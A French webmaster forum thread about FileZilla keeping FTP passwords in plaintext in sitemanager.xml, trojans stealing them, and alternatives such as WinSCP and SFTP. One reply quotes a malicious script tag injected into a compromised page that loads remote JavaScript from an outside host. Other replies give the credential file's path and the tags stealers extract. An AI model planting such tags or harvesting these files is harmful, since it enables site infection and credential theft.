Filezilla est un cancer dans la sécurité de vos sites internet. Danger !

WRInaute passionné
Hello

Fillezilla est un cancer ? Allez, une rapide démonstration sera plus évidente.
Pour ceux qui utilisent ce logiciel leader de FTP, allez dans C:\Users\<nom d'utilisateur>\AppData\Roaming\FileZilla et consultez le fichier sitemanager.xml.

Voilà, j'en dis pas plus. Et ajoutez cela à un PC infecté par un trojan (pourtant j'ai nod32 + spybot :cry:) et vous aurez le pompom : Le nettoyage de vos sites et le changement de mot de passe de tous les comptes FTP utilisés par Filezilla.

Merci Fillezilla. MERCI. Je ne savais pas ce que j'allais faire ce week end, maintenant je sais.

Lolo

Pour les fainéants, voici un extrait du fichier en question :
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
<Servers>
<Server>
<Host>domaine.fr</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>nom d'utilisateur</User>
<Pass>tu le vois mon mot de passe en clair ? Hein, tu le vois ??? Hé Ho !!! Coucou je suis là !!! C'est Open Bar. PROFITE MON AMI, PROFITE C'EST GRATUIT</Pass>
<Logontype>1</Logontype>
<TimezoneOffset>0</TimezoneOffset>
<PasvMode>MODE_DEFAULT</PasvMode>
<MaximumMultipleConnections>0</MaximumMultipleConnections>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
<Name>domaine.fr</Name>
<Comments></Comments>
<LocalDir></LocalDir>
<RemoteDir></RemoteDir>
<SyncBrowsing>0</SyncBrowsing>
</Server>
...
 
WRInaute passionné
loran750 a dit:
Fillezilla est un cancer ? Allez, une rapide démonstration sera plus évidente.
Pour ceux qui utilisent ce logiciel leader de FTP, allez dans C:\Users\<nom d'utilisateur>\AppData\Roaming\FileZilla et consultez le fichier sitemanager.xml.
ben t'as qu'à plus utiliser windows t'auras plus ce problème ou n'utilise plus filezilla
 
WRInaute accro
En fait pour l'utiliser en toute sécurité il ne faut pas sauvegarder son mot de passe et faire du sftp. Je crois bien que les autres logiciels c'est la même chose.

A plus.
 
WRInaute passionné
@ loran750

FileZilla est un logiciel opensource. Tu as donc à ta disposition des adresses e-mail de contact pour signaler tout bug ou problème.

-> signale leur ce problème par email, tu auras très rapidement une mise à jour disponnible.

As tu gougeulisé ce problème ?
 
WRInaute passionné
@tofm2 : c'est une solution un peu trop radicale. Pas assez geek pour prendre linux en tant qu'OS de bureau, pas assez fiote pour prendre MacOS... ;) *
Quant à ce problème, cela fait plus d'1 an qu'il est régulièrement soulevé par la communauté mais n'est pas pris en compte par le "top management de Filezilla.
Tu utilises quoi comme logiciel de FTP ?

@poweb : spout (membre de WRI) m'a conseillé WinSCP à la place de Filezilla, et non les mots de passe ne sont pas en clair.

C'est vrai, je n'aurai pas du stocker mes mdp dans Filezilla... Mais je ne pensais pas imaginer qu'ils étaient stockés en clair !
 
WRInaute passionné
loran750 a dit:
C'est vrai, je n'aurai pas du stocker mes mdp dans Filezilla... Mais je ne pensais pas imaginer qu'ils étaient stockés en clair !
Dédramatise la situation, ces MDP en clair sont protégés par ton MDP de session windows, tu as besoin d'avoir une session windows ouverte sous ton identifiant pour que tes MDP FTP soient lisibles.
Tu as bien mis un mot de passe à ta session windows, hein ? Sinon, heu, les plaintes de ce genre...... :roll:
 
WRInaute passionné
Ben vi quand même tofm2.
Par contre, d'après ce que j'ai lu sur le ouaibe, c'est l'oeuvre d'un trojan qui n'a pas été détecté par mon AV.
Donc grosse séance de mises à jour et d'installation d'outils pour traquer le méchant trojan.
 
WRInaute passionné
Filezilla est réputé pour ses failles.. le mieux est effectivement de ne jamais sauvegarder ses mdp (quite à en choisir un moins compliqué lol)
 
WRInaute passionné
et comme il réutilise ton mdp pour se connecter à chaque fois, il faut bien qu'il soit plus ou moins clair.
Filezilla étant open source, même si ton mdp n'est pas en clair, il l'est quand même vu qu'on peut voir toute méthode d'encryption utilisée...
 
WRInaute accro
RomsIW a dit:
et comme il réutilise ton mdp pour se connecter à chaque fois, il faut bien qu'il soit plus ou moins clair.
Filezilla étant open source, même si ton mdp n'est pas en clair, il l'est quand même vu qu'on peut voir toute méthode d'encryption utilisée...
FTP passant en clair sur le réseau, ça peut même être un trojan qui sniffe les connexions FTP... indépendamment du client, mots de passe enregistrés ou pas.
 
WRInaute discret
connu le même problème il y a quelques temps. Je compatis. Une iframe vérolée pour chaque fichier index.php ou .html de mes sites...
Pour une meilleur sécu, si tu as une ip fixe et un serveur dédié, tu n'autorise que ton ip pour les connections ftp.
 
WRInaute accro
Purée ça fait peur 8-\

Du coup j'ai pris peur, mes pwd sont désormais "ailleurs" et je les retape au besoin...

Par contre c'est chiant car Filezilla ne demande pas le PWD s'il est vide et/ou incorrect :x



WinSCP a une ergonomie qui me semble moyenne, non ?
 
WRInaute discret
Pour ma part c'est un flash tout moisi qui m'avait refilé le vers... Mon AV avait bien gueulé (avast a l'époque) mais j'ai tout de même été touché. C'est la flippant quand tu découvre que google t'a bloqué pour cause de script malveillant (ça se débloque rapidement via webmaster tools après nettoyage).
 
WRInaute passionné
Quels logiciels FTP,
et Antivirus/Trojan/Malware/Script kiddies utilisez vous ?

Là, je fais une session de Nod32 antivirus + Spybot + + Malware Bytes + Hijackthis ...
 
WRInaute discret
avec filezilla (mdp enregistré).
Je crois que le vers était Gumblar, j'avais un paquet de sites infestés un moment.
Avec windows, j'ai jamais trop confiance, j'avais préféré formater et repartir sur une base saine
 
WRInaute accro
cedric_g a dit:
Purée ça fait peur 8-\

Du coup j'ai pris peur, mes pwd sont désormais "ailleurs" et je les retape au besoin...

Un fichier texte nommé "Tousmesmotsdepassesecret.txt" placé sur le bureau, c'est pas forcément le meilleur endroit Cedric :)
 
WRInaute passionné
lambi521, c'est à partir de la version 3 de Filezilla. (si c'est pas dans /utilisateurs, c'est dans /users ou dans /documents & settings ...)
 
WRInaute accro
loran750 a dit:
lambi521, c'est à partir de la version 3 de Filezilla. (si c'est pas dans /utilisateurs, c'est dans /users ou dans /documents & settings ...)
dans
C:\Users\ton compte\AppData\Roaming\FileZilla
pour vista et 7
 
WRInaute accro
cedric_g a dit:
WinSCP a une ergonomie qui me semble moyenne, non ?
Ce n'est pas pire que Filezilla et tu peux passer d'une session à une autre dans la même fenêtre.

Ps : lorsque je suis passé à WinSCP, après désinstallation de FileZilla, le fichier sitemanager.xml et d'autres étaient toujours présents et il m'a fallu supprimer le dossier à la main.
 
WRInaute occasionnel
J'ai eu le même probleme dernierement avec un trojan qui a récupérer mes mots de passes et un robot qui ma pourri tout mes fichier avec des redirections des liens etc !! Je crois que je vais également passer à WinSCP !
 
WRInaute passionné
loran750 a dit:
Quels logiciels FTP,
et Antivirus/Trojan/Malware/Script kiddies utilisez vous ?

Là, je fais une session de Nod32 antivirus + Spybot + + Malware Bytes + Hijackthis ...
mais pourquoi continuer à utiliser windows ? :lol:
 
WRInaute passionné
Moi j'utilise le canard sur ma pomme :)
Et c'est tranquille et rapide ^^

Quel bonheur indescriptible de ne pas travailler sous windows... les cheveux blancs mettront plus de temps à apparaître :D
 
WRInaute accro
Robinson a dit:
Moi j'utilise le canard sur ma pomme :)

Pareil. Sauf que jusque-là j'utilisais Transmit, et en changeant de machine, j'ai eu des soucis d'affichage pour certains dossiers. Donc j'ai fini par switcher vers Cyberduck, même si j'envisager de re-switcher vers fugu : http://www.versiontracker.com/dyn/moreinfo/macosx/15693

Par contre, c'est un peu HS comme question, mais tu utilises un frontend mysql ? Je bosse avec CocoaMysql, mais si il y a mieux (même payant) je suis preneur.
 
WRInaute accro
finstreet a dit:
cedric_g a dit:
Purée ça fait peur 8-\

Du coup j'ai pris peur, mes pwd sont désormais "ailleurs" et je les retape au besoin...

Un fichier texte nommé "Tousmesmotsdepassesecret.txt" placé sur le bureau, c'est pas forcément le meilleur endroit Cedric :)

Ah ben merde, comment t'as deviné ???
 
WRInaute accro
Euh passer à Linux, même pas en rêve. Ou alors vous me trouvez Lightroom 3.2 qui fonctionne sous ce truc, avec tout l'environnement de développement .Net idem :twisted:


PS : j'ai débuté en PC sous DOS 3.1 (et ai vaguement connu la version 2.0 sur un vieux "transportable" Compaq que mon père ramenait de son boulot, avec un écran 7" monochrome vert et un clavier "détachable"), et je n'ai JAMAIS choppé de virus. Je sais vraiment pas ce que vous foutez avec vos PC ! Ah oui : signe particulier, je désinstalle toutes les merdes genre MSN, et je n'ai JAMAIS vu à quoi ressemble un truc de P2P ;) (c'est p'têt ça la différence non ?)
 
WRInaute accro
J'ai aussi commencé avec DOS (mais le 5), et ait partagé durant des années l'univers Windows, et n'ait jamais choppé de virus ni de troyen à la con. Ceci dit, quand j'ai découvert ce que proposait ergonomiquement l'OS d'Apple et les logiciels qui tournent dessus, je n'ai pas attendu très longtemps pour switcher.

Et Lightroom tourne sans souci sur OSX, de ce que j'en sais.
 
WRInaute accro
finstreet a dit:
cedric_g a dit:
Purée ça fait peur 8-\

Du coup j'ai pris peur, mes pwd sont désormais "ailleurs" et je les retape au besoin...

Un fichier texte nommé "Tousmesmotsdepassesecret.txt" placé sur le bureau, c'est pas forcément le meilleur endroit Cedric :)
Tu devrais mettre des tirets pour mieux profiter du référencement des mots-clefs.
Quand tu seras bien positionné sur ta phrase, commence à travailler les expressions de deux mots, puis un seul.
Réserve le .doc et le .rtf pour éviter le squat.
Coche "afficher les fichiers cachés" pour éviter d'être accusé de cloacking.
:mrgreen:
 
WRInaute passionné
UsagiYojimbo a dit:
Par contre, c'est un peu HS comme question, mais tu utilises un frontend mysql ? Je bosse avec CocoaMysql, mais si il y a mieux (même payant) je suis preneur.
Non aucun frontend, je suis terrifié par la facilité d'y faire une très très grosse boulette.... :cry:

CocoaMysql a-t-il de nombreuses sécurités type "êtes-vous sûr de vouloir supprimer la colonne X ?"

J'en avais eu un sous windows il y a des années et il n'y avait aucun avertissement.. la cata :oops:
 
WRInaute passionné
@Robinson : Essaye Toad for MySQL (bon), Navicat (ça va), MySQL-Front (mysqlfront.de ça va aussi).

@fredfan : détends toi ! Prends un jus de fruit (100% pur PR-Juice évidemment) ... Mais tu as entièrement raison dans le cas où on utilise Google Desktop à la place de l'outil de recherche windows.

@bruno212 : scp & ssh, c'est bien lorsqu'on a besoin de faire des transferts entre serveur (scp) ou de faire des traitements en ligne de commande (ssh). Je les utilise très fortement. Bien plus que FTP. Et FTP, je ne l'utilise que lorsque je travaille un fichier sous windows.
Et Windows est tout de même bien plus intéressant que linux pour bon nombre d'entre nous. Au minimum à cause du pack Office. Et qu'on me parle pas d'Open Office ou de ses concurrents. Bons, très bons, mais quand j'échange des fichiers avec des clients, j'ai pas envie de me casser le cul à vérifier si le fichier "office compatible" l'est à 100%. J'ai fait l'effort il y a quelques années, j'en suis revenu.

Bon. Fin du HS. On a besoin de Windows. Revenons à nos moutons : Transfert FTP sécurisé, éventuellement trouver une alternative.
 
WRInaute impliqué
Bonjour,

j'utilise principalement l'outil de dreamweaver pour l'export de mes sites. Pensez vous qu'il contienne le même genre de failles ?

Edit: j'utilise aussi Filezilla et effectivement j'ai trouvé ce fameux fichier recentservers.xml. C'est vrai que c'est vraiment limite...
 
WRInaute accro
franckM a dit:
j'utilise aussi Filezilla et effectivement j'ai trouvé ce fameux fichier recentservers.xml. C'est vrai que c'est vraiment limite...
limite en quoi ? étant donné que le fichier n'est accessible que sur votre compte windows, il faut donc avoir accès à votre compte utilisateur pour y accéder.
Après, un bon antivirus, un bon firewall devrait permettre d'empêcher la fuite d'infos. Si vous laissez un logiciel s'installer sur votre pc, avec un accès internet, c'est sûr qu'au niveau risque vous faites tout pour...
Et le fait de taper à chaque fois son password pour y accéder est, à mon avis, bien plus dangereux, car tant qu'à faire à installer un spyware sur un pc, autant mettre un keylogger et là, le fait de taper son password au lieu de l''avoir enregistré au préalable est d'une aide appréciable pour les pirates :mrgreen:
 
WRInaute accro
UsagiYojimbo a dit:
J'ai aussi commencé avec DOS (mais le 5), et ait partagé durant des années l'univers Windows, et n'ait jamais choppé de virus ni de troyen à la con. Ceci dit, quand j'ai découvert ce que proposait ergonomiquement l'OS d'Apple et les logiciels qui tournent dessus, je n'ai pas attendu très longtemps pour switcher.

Et Lightroom tourne sans souci sur OSX, de ce que j'en sais.

Je n'habite pas à Troyes mais j'y travaille, fait gaffe à ce que tu écris :mrgreen:


(ceci dit, au volent, les troyens... Nan rien :twisted: )
 
WRInaute passionné
@Leonick

Et bien ça m'est arrivé. D'où ce topic.
Ma config : un AV (Nod32) + un antispyware (spybot) + aucun firewall.
Tu préconises quoi toi / Tu disposes de quoi sur ton PC ?
 
WRInaute accro
Robinson a dit:
J'en avais eu un sous windows il y a des années et il n'y avait aucun avertissement.. la cata :oops:

Sous Windows j'utilise pas mal SQLYog, qui est pas mal fichu ergonomiquement.

Par contre, vu que je me sers des ses softs pour ce qui est de faire de l'import/export, et pas de la créa/modif de tables, je ne saurai dire.
 
WRInaute accro
loran750 a dit:
Tu préconises quoi toi / Tu disposes de quoi sur ton PC ?
préconiser c'est peut-être beaucoup dire vu mes connaissances, mais j'ai un firewall (Zonealarm) qui m'avertit quand une appli tente une connexion depuis, ou vers, mon pc. On peut autoriser l'accès en local (par exemple si une appli ne peut être utilisée que sur notre serveur de test) ou sur internet. Donc quand on installe un logiciel, s'il n'a aucun besoin de se connecter à internet, on bloque son accès (y compris pour les fois suivantes). Avant, il y a 5-6 ans, j'utilisais kerio qui était vraiment bien, car on pouvait avoir le suivi log de toutes les connexions et, surtout, on pouvait filtrer non seulement accès externe/interne, mais aussi par ip (n'autoriser que l'accès vers/depuis des ip (ou rangées) très précises.
 
WRInaute passionné
L'équipe de dev de FileZilla a clairement dit qu'ils ne changeraient pas leur méthode de fonctionnement à ce niveau, en disant que c'est la plateforme qui doit être sécurisé (antivirus/firewall/etc). Ils n'ont pas tord.
Personnellement, je suis bien content que mes clients utilisent filezilla, car quand ils me disent "tu peux me changer ce fichier, mais je n'ai pas mon mot de passe, je l'ai enregistré" je peux aller le récupérer ;)

Si vous êtes sur dédié ne serait-ce que changer le port permet déjà de limiter la plupart des scripts. Le dernier script de trojan de ce style que j'ai regardé ne récupérait que les balises : <User><Pass><Host>

Si vous êtes sur dédié (et que vous n'utilisez pas filezilla), une bonne technique à mettre en place est d'installer filezilla, de créer un compte avec login/pass invalide, et de créer un jail pour fail2ban. Si la chaine est détecté, ça coupe le FTP, ou envoie un mail, ou pleins d'autres choses (personnellement c'est SMS). Comme ça je sais que je dois formater ;) Filezilla n'est pas si mal non ?

Edit: Et si vous voulez un filezilla sécurisé, il vous suffit de remplacer le nom du fichier xml dans les sources et de le recompiler ;)
 
WRInaute accro
Merci Julia pour ces infos bien utiles :)

Sinon j'ai essayé (et adopté !) WinSCP ! Finalement il est vraiment pas mal. Surtout la synchro de répertoires : c'est bien pratique !!!
 
WRInaute passionné
cedric_g a dit:
Merci Julia pour ces infos bien utiles :)

Sinon j'ai essayé (et adopté !) WinSCP ! Finalement il est vraiment pas mal. Surtout la synchro de répertoires : c'est bien pratique !!!

Bien configuré, chose que j'ai jamais réussi à faire avec filezilla, un double clic permet d'ouvrir un fichier avec notepad++, et lorsqu'on sauvegarde ce fichier (ctrl + S), ça s'auto upload sur le FTP. C'est peut-être mieux géré par winscp récemment.
 
WRInaute impliqué
j'utilise windows et filezilla depuis des annees, avec antivirus et firewall, je sais tres bien que ce fichier existe puisque je m'en sers lorsque je prepare un nouveau pc, je copie ce fichier dans ma nouvelle install de filezilla, bien pratique, et pour els trojans, cela ne m'est pas encore arrive. Peut etre si j'ai de la chance ca m'arrivera bientot, j'aimerai bien moi aussi passer des heures a tout reparer :)
 
WRInaute accro
UsagiYojimbo a dit:
Sous Windows j'utilise pas mal SQLYog, qui est pas mal fichu ergonomiquement.
Idem, j'ai gagné entre 30 à 50% de temps au niveau des manipulations MySQL par rapport à PHPMyAdmin.

cedric_g a dit:
Sinon j'ai essayé (et adopté !) WinSCP ! Finalement il est vraiment pas mal. Surtout la synchro de répertoires : c'est bien pratique !!!
Ça fait un bail que je me tue à le dire, l'essayer c'est l'adopter :D
 
WRInaute accro
Julia41 a dit:
Bien configuré, chose que j'ai jamais réussi à faire avec filezilla, un double clic permet d'ouvrir un fichier avec notepad++, et lorsqu'on sauvegarde ce fichier (ctrl + S), ça s'auto upload sur le FTP. C'est peut-être mieux géré par winscp récemment.
avec le click droit, on peut le faire sur filezilla, on paramètre l'éditeur de texte et lors de la fermeture, filezilla demande si on veut mettre à jour le fichier distant. Il y a juste un problème, c'est que, malgré un rafraichissement, il ne met pas la taille à jour sur le serveur distant (du moins sur le filezilla ouvert, car à la réouverture, c'est ok)
 
WRInaute passionné
Bonsoir,
Donc à part WinSCP (pas très user-friendly) pas de réelles alternatives (libre) sous Windows ?
J'ai regardé sur framasoft et je n'ai malheureusement pas trouvé mon bonheur.

Je travail depuis des années avec Filezilla (qui me convient très bien), mais cette histoire de mot de passe me refroidis pas mal.
 
WRInaute passionné
Ca fonctionne aussi avec Windows --> connecter un lecteur réseau... Après je ne sais pas ce que cela vaut au niveau sécurité.
 
WRInaute accro
guicara a dit:
Donc à part WinSCP (pas très user-friendly) pas de réelles alternatives (libre) sous Windows ?

Je ne vois pas ce qu'il a de moins user friendly:
http://filezilla-project.org/images/screenshots/fz3_win_main.png
vs
http://winscp.net/eng/data/media/screenshots/commander.png
C'est simplement bcp plus complet, et me semble plus "pro".
Avec les touches de raccourci à la "Norton commander", il y a moyen de gagner pas mal de temps.
Même quand j'étais sous linux, j'avais WinSCP sous Wine ... pas trouvé mieux (il y avait pourtant fish:// intégré au filemanager).

guicara a dit:
Je travail depuis des années avec Filezilla (qui me convient très bien), mais cette histoire de mot de passe me refroidis pas mal.
Je dirais que peut importe le client, c'est surtout FTP qui faut éviter au profit de SFTP.
Il faut jouer avec ettercap pour s'en rendre compte :D
 
WRInaute passionné
spout a dit:
Je dirais que peut importe le client, c'est surtout FTP qui faut éviter au profit de SFTP.
Il faut jouer avec ettercap pour s'en rendre compte :D

Je vais rester WinSCP pour voir ce que ça donne.
Sinon mon compte principal est en SFTP, mais les transfert sont beaucoup plus lents qu'en FTP (2x plus de temps).
 
Nouveau WRInaute
Salut,

Je témoigne également du fait que je m'étais fait spolié tous mes sites il y a quelques mois à cause de cette "faiblesse" dans Fillezilla
Je suis pourtant un utilisateur averti (firewall, AV, ..), il n'empêche :p

L'ersatz de solution que j'ai choisi : ne plus sauvegarder mes mdp dans Fillezilla :?

J'ai relevé sur ce topic l'idée de limiter les IP ayant l'accès au FTP, je me pencherai dessus :wink:
 
WRInaute accro
domark a dit:
L'ersatz de solution que j'ai choisi : ne plus sauvegarder mes mdp dans Fillezilla :?
sauf que si, avec toutes les protections sur ton pc, un programme a réussi à s'installer en tache de fond pour copier ton fichier de config filezilla, qui dit qu'un keylogger n'a pas, aussi, été installé ? Et dans ce cas, taper tes passwords à chaque fois est bien plus dangereux
 
Nouveau WRInaute
Salut à tous !
Bon j'arrive un peu après la discussion mais bon ;)
J'ai aussi eu un problème de trojan en fin aout, le 25 pour être précis.
Je me suis fait virusser sur le site d'un client qui lui-même s'était fait virusser par la copine d'un ami qui avait utilisé son pc pour lire son mail en russie ... ... ... bref. Je me demande d'ailleurs si ces virussages ne sont pas à l'origine de certains des vôtres, allez savoir.
Mon client est sous XP avec je crois kaspersky, son pc n'est pas resté infecté à priori après l'attaque mais ses mots de passe filezilla ont été volés.
En revanche je n'avais "que" Windows security essentials", qui a détecté le virus mais n'a pas fini le ménage, j'ai dû nettoyer avec un rescue disk, par la suite j'ai mis kaspersky
Les deux pc sont dotés de pare-feus et de systèmes d'exploitation à jour (je dis pas ça pour vous faire peur hein ^^)
J'ai été virussé en utilisant Chrome (up-to-date), mon client avec un navigateur indépendant utilisant le moteur de IE8.
L'adresse du script qui m'a virussé n'était pas encore enregistrée comme dangereuse, je n'ai sans doute pas eu de chance en allant sur le site dans les quelques minutes ou heures pendant lesquelles le virus était au début de son existence et pas encore identifié par les serveurs de sécurité internationaux. Mais ça peut arriver à tout le monde.

Pour le virussage ben rien de spécial à faire hein, juste aller sur un site internet lui-même virussé et voilà, rien à installer etc etc, le virus reprend les droits de l'utilisateur connecté et s'installe, vole les fichiers filezilla etc. Le bonheur, 12 heures d'affilée à réparer les sites de mes clients (et encore j'ai trouvé un script qui me nettoyait automatiquement les fichiers).

Enfin au final j'ai vu que sur le site officiel de filezilla le développeur principal joue aux cons et dit que les gens n'ont qu'à sécuriser leur pc blablabla, et qu'un cryptage ne servirait à rien si le pc est virussé (alors qu'il ne le reste pas systématiquement). Ce serait plus simple de dire qu'il a la flemme de crypter les mots de passe mais bon...

Tout ça pour dire au final que je pense moi aussi passer sur winscp si je n'arrive pas à les convaincre de mettre un cryptage en place. C'est aussi un bon outil, même si je n'aurais pas pensé à lui pour gérer des sessions ftp.
 
WRInaute accro
Arkhee a dit:
Les deux pc sont dotés de pare-feus et de systèmes d'exploitation à jour (je dis pas ça pour vous faire peur hein ^^)
J'ai été virussé en utilisant Chrome (up-to-date), mon client avec un navigateur indépendant utilisant le moteur de IE8.

Pour le virussage ben rien de spécial à faire hein, juste aller sur un site internet lui-même virussé et voilà, rien à installer etc etc, le virus reprend les droits de l'utilisateur connecté et s'installe, vole les fichiers filezilla etc.
alors là, j'ai plus que de sérieux doutes : les navigateurs n'ont pas les privilèges suffisants pour cela. Si tu veux pouvoir utiliser un module java avec des droits élargis, il faut accepter un certificat en provenance de ce site. Attention, je parle de java, pas de javascript.
Sinon, avec le moteur IE, il "suffit" d'accepter d'installer un activeX, mais là encore, il faut installer quelque chose.

Après, le fait d'avoir un firewall ne fait pas automatiquement une bonne barrière de sécurité, tout comme avoir une porte blindée n'empêche pas de laisser rentrer n'importe qui, voire même, laisser la porte ouverte :wink:
 
Nouveau WRInaute
Saut,
alors là, j'ai plus que de sérieux doutes : les navigateurs n'ont pas les privilèges suffisants pour cela.

Ben en fait si tu veux je ne te présente pas une belle théorie, mais une réalité (hélas). Je tiens à noter que je fais du développement web depuis 7 ans, que je m'occupe occasionnellement de dépanner et dévirusser des clients (je suis à mon compte) etc etc.
Et donc, c'est bel et bien par un javascript inclus dans une page que mon pc a été virussé, de même que mon client, sans autre interaction de notre part que d'aller sur la mauvaise page.

Evidemment comme c'est classiquement le cas sous windows nos comptes respectifs sont des comptes administrateur (moi sous win7 et lui sous XP), ce qui n'a pas dû aider.

La perte de donnée s'est, à priori, limitée au fichier de mots de passe de filezilla. J'ai quand même changé tous les autres mots de passe importants que je stockais dans KeePass, on ne sait jamais.
 
WRInaute accro
Arkhee a dit:
Enfin au final j'ai vu que sur le site officiel de filezilla le développeur principal joue aux cons et dit que les gens n'ont qu'à sécuriser leur pc blablabla, et qu'un cryptage ne servirait à rien si le pc est virussé (alors qu'il ne le reste pas systématiquement). Ce serait plus simple de dire qu'il a la flemme de crypter les mots de passe mais bon...
Je pense pourtant qu'il a raison. Suppose que FileZilla crypte les mots de passe. Il va devoir les décrypter au prochain redémarrage. A partir du source public de FileZilla, ce serait un jeu d'enfant d'exécuter le même décryptage.

Jean-Luc
 
WRInaute accro
@spout: +1 reco c'est quand même l'argument essentiel du sujet !

Quelqu'un a-t-il une liste d'hébergeurs acceptant le sFTP? Y a-t-il un surcoût ?
 
WRInaute accro
Faut pas être parano, non plus. La différence entre FTP et SFTP, c'est que la transmission entre votre poste de travail et le serveur est codée (encryptée). Franchement, je ne vois qu'un cas pratique où c'est utile, c'est quand vous utilisez un WiFi public ou non sécurisé. Et la sagesse voudrait que vous n'utilisiez pas ce type de connexion pour des données confidentielles ou personnelles.

Jean-Luc
 
WRInaute passionné
jeanluc a dit:
Faut pas être parano, non plus. La différence entre FTP et SFTP, c'est que la transmission entre votre poste de travail et le serveur est codée (encryptée). Franchement, je ne vois qu'un cas pratique où c'est utile, c'est quand vous utilisez un WiFi public ou non sécurisé. Et la sagesse voudrait que vous n'utilisiez pas ce type de connexion pour des données confidentielles ou personnelles.

Jean-Luc

J'aurais pas dit mieux. Il y a aussi l'accès au routeur dans les entreprises, mais bon, généralement, ça reste plutôt sécu.
Et il y a aussi une grosse différence de puissance (pour récupérer les mots de passe) entre lire un fichier et sniffer des paquets réseaux.

Dans les autres protos qui craignes, le pop/imap, si pas SSL/TLS ça se sniff aussi facilement que du FTP, et ça permet d'envoyer du spam.
 
WRInaute accro
je pense que le premier problème c'est tous simplement inadmissible de se faire infecter par un virus informatique sur un ordinateur de travail(évitons de cliquer sur n'importe quel lien douteux sur internet, et évitons des DISQUE DUR EXTERNE USB et autres CLÉ USB qui pourraient être infecter par un voir plusieurs virus informatique), en suite il est vrai que les informations du fichier de FIlezilla aurai pu être crypter comme peux le faire firefox pour les MDP et login, par contre pour transférer des donner informatique vers un serveur, mieux vaut privilégier le SSH, alors je ne sais pas se que vaut la sécurisation SSH dans les faites, mais me semble qu'en premier lieu se connecter en SSH est bien plus judicieux et c'est juste la base de la base, bien même avant de prendre le risque de se faire infecter par un virus informatique, parce que des données IP ça se snif comme la si bien dit Julia41.

pour le moment je suis en SSH sur filezilla et je ne m'en porte pas plus mal que ça, pour le moment, et la dernière fois ou mon serveur FTP avait été hacker, je n'avais pas de virus sur mon ordinateur( j'ai tous scanné et RAS) en fait tous simplement ça a due être snifer, voire le serveur y est aller en mode brut force, et depuis que je suis PASSER au SSH et un MDP plus complexe et plus long et surtout qui est re-générer toutes les semaines, comme ça si une attaque se fait avec un ancien MDP ou logins et bien il pourra essayer y rentrera pas.
 
WRInaute accro
en fait, vous êtes trop pas assez paranos : à quoi sert de crypter un mot de passe si on peut l'obtenir par une attaque par dictionnaire ?
N'utilisez-vous pas le même mot de passe pour tous vos comptes (mail, divers forums, etc...) ? et donc, facile, si on est le webmaster d'un forum indélicat de récupérer les identifiants
Est-ce que quelqu'un a déjà eu de réelles preuves que son hack a été institué en récupérant le fichier des mots de passes de filezilla ou c'est juste des supputations ?
 
WRInaute passionné
Leonick, ben moi puisque tous ceux qui étaient dans ce fichier ont été touchés, tandis que ceux dont les mots de passe étaient dans ma tête, non...
de plus il y a bcp de topics sur le "problème" Filezilla sur les forums US.
 
WRInaute accro
un MDP long et complexe ça se génère, et régénère une fois par semaines, en suite une fois le MDP générer on l'imprime sur une feuille de papier, qu'on range soigneusement en suite pas besoin de sauvegarde ses MDP dans un fichier vue qu'ils ont été imprime, on les retape à chaque fois qu'on en à besoins, si les MDP sont long complexe et changer plusieurs fois par mois, aucun risque, sauf si on à un virus informatique de type keylogger sur sont ordinateur de travail.
 
WRInaute accro
mipc a dit:
sauf si on à un virus informatique de type keylogger sur sont ordinateur de travail.
tout à fait. et si on est "capable" de laisser s'installer sur son pc un programme qui va envoyer des fichiers locaux sur le net, on est aussi "capable" de laisser s'installer un keylogger.
 
WRInaute accro
mipc a dit:
on l'imprime sur une feuille de papier

hum hum hum Premier truc qu'on dit de ne pas faire dans les sociétés. Un mot de passe ca ne s'imprime JAMAIS. Pourquoi pas mettre une étiquette sous le clavier aussi ou alors directement sur l'écran.
 
WRInaute accro
Et si on travaille sur les sites de 50 clients, on a 50 mots de passe, parce qu'on ne peut pas utiliser le mot de passe d'un client chez un autre client. Et il y a ceux pour lesquels vous pouvez choisir le mot de passe vous-même, ceux qui vous imposent le mot de passe, ceux qui vous obligent à le changer chaque semaine,... Pas facile à gérer, tout ça... :mrgreen:

Jean-Luc
 
WRInaute accro
c'est simple, en fait, en entreprise il y a 2 types de mots de passe : les super simples qu'on peut trouver par ingénierie sociale ou attaque par dictionnaire et les plus complexes pour lesquels un post-it est collé sur l'écran :mrgreen:
 
WRInaute accro
Leonick a dit:
c'est simple, en fait, en entreprise il y a 2 types de mots de passe : les super simples qu'on peut trouver par ingénierie sociale ou attaque par dictionnaire et les plus complexes pour lesquels un post-it est collé sur l'écran :mrgreen:

pour les banques, c'est heureusement un poil plus sécurisé :) t'as même pas le droit de quitter ton poste, sans avoir fermé ta session
 
WRInaute accro
finstreet a dit:
Leonick a dit:
c'est simple, en fait, en entreprise il y a 2 types de mots de passe : les super simples qu'on peut trouver par ingénierie sociale ou attaque par dictionnaire et les plus complexes pour lesquels un post-it est collé sur l'écran :mrgreen:

pour les banques, c'est heureusement un poil plus sécurisé :) t'as même pas le droit de quitter ton poste, sans avoir fermé ta session
ce qui n'empêche que si tu leur donnes un mot de passe trop complexe, il y a de fortes chances que tu trouves un post-it, éventuellement dans le tiroir, s'il n'est pas à l'écran
 
Nouveau WRInaute
@polweb : la page qui m'a virussé contenait ces lignes en bas de page :
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->

l'adresse et le nom du script étaient légèrement différents, sinon c'est la même chose.
et je le répète : mon pc a été virussé UNIQUEMENT en affichant la page sur laquelle ce script se trouvait, de même que mon client, et nous avons tous deux des pc sécurisés et à jour.

Comme cela a déjà été dit, l'expérience a prouvé que c'est bel et bien la base de mots de passe de filezilla qui a été volée, l'intégralité des sites enregistrés dans la base de mdp de filezilla sur ce PC a été corrompue, et pas les autres sites sur lesquels je travaille par l'intermédiaire de dreamweaver par exemple.

@jeanluc : l'idée est que l'utilisateur saisisse un mot de passe maitre, pas que Filezilla crypte tout seul. a l'image de logiciels de stockage de mots de passe tels que keepass ou passwordsafe. bien sûr, il ne faut pas que les pirates puissent récupérer le mot de passe quelque part

@spout et @JanoLapin : passer en sftp ne résoud pas le problème de fond. Je suis d'accord que c'est un plus évident, mais on décide rarement ce genre de chose quand on travaille avec de nombreux sites. 200 sites piratés, probablement que la plupart d'entre eux ne sont accessibles qu'en FTP et qu'en plus le webmaster n'a pas le choix du login & du passe.
Qui plus est le problème de fond n'est pas là, si le pc est infiltré la base de mots de passe sera volée, sftp ou pas. Or c'est bel est bien le sujet de ce mail : la base de mots de passe de Filezilla est en clair.

